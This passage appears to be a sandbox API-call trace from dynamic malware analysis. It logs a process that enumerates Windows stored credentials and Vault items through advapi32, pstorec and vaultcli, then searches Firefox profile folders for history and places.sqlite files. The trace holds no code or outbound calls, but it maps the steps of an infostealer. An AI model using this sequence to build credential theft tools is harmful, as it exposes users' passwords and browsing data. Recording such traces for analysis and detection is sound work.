phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.049] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xfc, dwFlags=0x0) returned 1 [0086.049] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.049] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.049] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.049] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xa6, dwFlags=0x0) returned 1 [0086.049] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.049] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.049] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.049] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0xa8, dwFlags=0x0) returned 1 [0086.049] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.049] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.050] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.050] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9a, dwFlags=0x0) returned 1 [0086.050] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.050] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.050] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.050] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x9c, dwFlags=0x0) returned 1 [0086.050] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.050] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.050] CryptCreateHash (in: hProv=0x58eb10, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28a940 | out: phHash=0x28a940) returned 1 [0086.050] CryptHashData (hHash=0x58e900, pbData=0x28a960, dwDataLen=0x84, dwFlags=0x0) returned 1 [0086.050] CryptGetHashParam (in: hHash=0x58e900, dwParam=0x2, pbData=0x28a924, pdwDataLen=0x28a93c, dwFlags=0x0 | out: pbData=0x28a924, pdwDataLen=0x28a93c) returned 1 [0086.050] CryptDestroyHash (hHash=0x58e900) returned 1 [0086.050] CryptReleaseContext (hProv=0x58eb10, dwFlags=0x0) returned 1 [0086.050] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0086.050] GetProcAddress (hModule=0x764f0000, lpProcName="CredReadA") returned 0x765371c1 [0086.051] GetProcAddress (hModule=0x764f0000, lpProcName="CredFree") returned 0x764fb2ec [0086.051] GetProcAddress (hModule=0x764f0000, lpProcName="CredDeleteA") returned 0x76537941 [0086.051] GetProcAddress (hModule=0x764f0000, lpProcName="CredEnumerateA") returned 0x76537381 [0086.051] GetProcAddress (hModule=0x764f0000, lpProcName="CredEnumerateW") returned 0x76537481 [0086.051] CredEnumerateW (in: Filter=0x0, Flags=0x0, Count=0x28b95c, Credential=0x28b960 | out: Count=0x28b95c, Credential=0x28b960) returned 0 [0086.080] FreeLibrary (hLibModule=0x764f0000) returned 1 [0086.080] LoadLibraryW (lpLibFileName="pstorec.dll") returned 0x71ec0000 [0086.083] GetProcAddress (hModule=0x71ec0000, lpProcName="PStoreCreateInstance") returned 0x71ec526c [0086.083] PStoreCreateInstance () returned 0x0 [0086.085] FreeLibrary (hLibModule=0x71ec0000) returned 1 [0086.086] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x6f4d0000 [0086.095] GetProcAddress (hModule=0x6f4d0000, lpProcName="VaultOpenVault") returned 0x6f4d26a9 [0086.096] GetProcAddress (hModule=0x6f4d0000, lpProcName="VaultCloseVault") returned 0x6f4d2718 [0086.096] GetProcAddress (hModule=0x6f4d0000, lpProcName="VaultEnumerateItems") returned 0x6f4d3099 [0086.096] GetProcAddress (hModule=0x6f4d0000, lpProcName="VaultFree") returned 0x6f4d4321 [0086.096] GetProcAddress (hModule=0x6f4d0000, lpProcName="VaultGetInformation") returned 0x6f4d24c0 [0086.096] GetProcAddress (hModule=0x6f4d0000, lpProcName="VaultGetItem") returned 0x6f4d3242 [0086.096] GetProcAddress (hModule=0x6f4d0000, lpProcName="VaultGetItem") returned 0x6f4d3242 [0086.096] VaultOpenVault () returned 0x0 [0086.711] VaultEnumerateItems () returned 0x0 [0086.711] VaultFree () returned 0x6f4d4321 [0086.711] VaultCloseVault () returned 0x6 [0086.711] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28b2b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 1 [0086.712] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0086.712] wcscat (in: _Dest=0x28b2b4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0086.712] wcscat (in: _Dest=0x28b2b4, _Source="Mozilla\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles" [0086.712] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28b4c0, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 1 [0086.712] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0086.712] wcscat (in: _Dest=0x28b4c0, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0086.712] wcscat (in: _Dest=0x28b4c0, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.712] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles") returned 0x39 [0086.712] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles") returned 0x39 [0086.712] wcslen (_String="*.*") returned 0x3 [0086.712] wcscpy (in: _Dest=0x28a8ac, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles" [0086.712] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles") returned 0x39 [0086.712] wcscat (in: _Dest=0x28a8ac, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles\\" [0086.712] wcscat (in: _Dest=0x28a8ac, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles\\*.*" [0086.712] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Profiles\\*.*", lpFindFileData=0x28ab34 | out: lpFindFileData=0x28ab34) returned 0xffffffff [0086.713] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.713] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.713] wcslen (_String="*.*") returned 0x3 [0086.713] wcscpy (in: _Dest=0x28a8ac, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.713] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.713] wcscat (in: _Dest=0x28a8ac, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0086.713] wcscat (in: _Dest=0x28a8ac, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*" [0086.713] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x28ab34 | out: lpFindFileData=0x28ab34) returned 0x592dd8 [0086.713] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.713] wcslen (_String=".") returned 0x1 [0086.713] wcscpy (in: _Dest=0x28ad84, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.713] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.713] wcscat (in: _Dest=0x28ad84, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0086.713] wcscat (in: _Dest=0x28ad84, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\." [0086.713] wcscmp (_String1=".", _String2="..") returned -1 [0086.713] wcscmp (_String1=".", _String2=".") returned 0 [0086.713] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28ab34 | out: lpFindFileData=0x28ab34) returned 1 [0086.713] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.713] wcslen (_String="..") returned 0x2 [0086.713] wcscpy (in: _Dest=0x28ad84, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.713] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.713] wcscat (in: _Dest=0x28ad84, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0086.713] wcscat (in: _Dest=0x28ad84, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.." [0086.713] wcscmp (_String1="..", _String2="..") returned 0 [0086.714] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28ab34 | out: lpFindFileData=0x28ab34) returned 1 [0086.714] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.714] wcslen (_String="zp0p8bce.default") returned 0x10 [0086.714] wcscpy (in: _Dest=0x28ad84, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.714] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.714] wcscat (in: _Dest=0x28ad84, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0086.714] wcscat (in: _Dest=0x28ad84, _Source="zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0086.714] wcscmp (_String1="zp0p8bce.default", _String2="..") returned 1 [0086.714] wcscmp (_String1="zp0p8bce.default", _String2=".") returned 1 [0086.714] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0086.714] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28ab34 | out: lpFindFileData=0x28ab34) returned 0 [0086.714] FindClose (in: hFindFile=0x592dd8 | out: hFindFile=0x592dd8) returned 1 [0086.714] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0086.714] wcslen (_String="history.dat") returned 0xb [0086.714] wcscpy (in: _Dest=0x28b6e8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0086.714] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0086.714] wcscat (in: _Dest=0x28b6e8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\" [0086.714] wcscat (in: _Dest=0x28b6e8, _Source="history.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\history.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\history.dat" [0086.714] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\history.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\history.dat")) returned 0xffffffff [0086.724] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0086.724] wcslen (_String="places.sqlite") returned 0xd [0086.724] wcscpy (in: _Dest=0x28b6e8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default" [0086.724] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default") returned 0x52 [0086.724] wcscat (in: _Dest=0x28b6e8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\" [0086.724] wcscat (in: _Dest=0x28b6e8, _Source="places.sqlite" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\places.sqlite") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\places.sqlite" [0086.724] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\places.sqlite" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\places.sqlite")) returned 0x2020 [0086.725] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\places.sqlite") returned 0x60 [0086.725] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\places.sqlite" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\mozilla\\firefox\\profiles\\zp0p8bce.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xe8 [0086.725] GetFileTime (in: hFile=0xe8, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x28b95c | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x28b95c*(dwLowDateTime=0x446149e0, dwHighDateTime=0x1d2db9e)) returned 1 [0086.725] CloseHandle (hObject=0xe8) returned 1 [0086.725] CompareFileTime (lpFileTime1=0x28b95c, lpFileTime2=0x28b964) returned 1 [0086.725] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\zp0p8bce.default\\places.sqlite") returned 0x60 [0086.726] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28b738, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 1 [0086.726] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28aef8, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 1 [0086.726] wcslen (_String="Mozilla\\Firefox\\Profiles") returned 0x18 [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0086.726] wcscpy (in: _Dest=0x28b528, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0086.726] wcscat (in: _Dest=0x28b528, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0086.726] wcscat (in: _Dest=0x28b528, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.726] wcslen (_String="Mozilla\\Firefox\\Profiles") returned 0x18 [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0086.726] wcscpy (in: _Dest=0x28b318, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0086.726] wcscat (in: _Dest=0x28b318, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" [0086.726] wcscat (in: _Dest=0x28b318, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0086.726] wcslen (_String="Mozilla\\Firefox") returned 0xf [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0086.726] wcscpy (in: _Dest=0x28b108, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0086.726] wcscat (in: _Dest=0x28b108, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0086.726] wcscat (in: _Dest=0x28b108, _Source="Mozilla\\Firefox" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox" [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.726] wcslen (_String="*.*") returned 0x3 [0086.726] wcscpy (in: _Dest=0x28a2dc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.726] wcscat (in: _Dest=0x28a2dc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0086.726] wcscat (in: _Dest=0x28a2dc, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*" [0086.726] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 0x592dd8 [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.726] wcslen (_String=".") returned 0x1 [0086.726] wcscpy (in: _Dest=0x28a7b4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.726] wcscat (in: _Dest=0x28a7b4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0086.726] wcscat (in: _Dest=0x28a7b4, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\." [0086.726] wcscmp (_String1=".", _String2="..") returned -1 [0086.726] wcscmp (_String1=".", _String2=".") returned 0 [0086.726] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 1 [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.726] wcslen (_String="..") returned 0x2 [0086.726] wcscpy (in: _Dest=0x28a7b4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0086.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x41 [0086.726] wcscat (in: _Dest=0x28a7b4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0086.726] wcscat (in: _Dest=0x28a7b4, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.." [0086.727] wcscmp (_String1="..", _String2="..") returned 0 [0086.727] FindNextFileW (in: hFindFile=0x592dd8, lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 1 [0086.727] wcslen (_String="C:\\Users\\BGC6u8Oy 